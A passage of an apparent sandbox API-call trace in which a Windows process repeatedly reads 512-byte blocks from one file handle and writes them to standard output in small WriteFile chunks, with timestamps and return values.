0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.117] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) 
returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.118] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] GetFileType (hFile=0x4c) returned 0x1 [0174.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.119] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.120] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.120] ReadFile 
(in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.120] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.121] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.121] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.121] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, 
lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, 
lpOverlapped=0x0) returned 1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.122] GetFileType (hFile=0x4c) returned 0x1 [0174.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.123] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.123] GetFileType (hFile=0x4c) returned 0x1 [0174.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.124] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.124] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0174.124] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] GetFileType (hFile=0x4c) returned 0x1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.124] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] 
GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.125] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] GetFileType (hFile=0x4c) returned 0x1 [0174.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.125] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | 
out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] GetFileType (hFile=0x4c) returned 0x1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.126] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] GetFileType (hFile=0x4c) returned 0x1 [0174.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.127] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, 
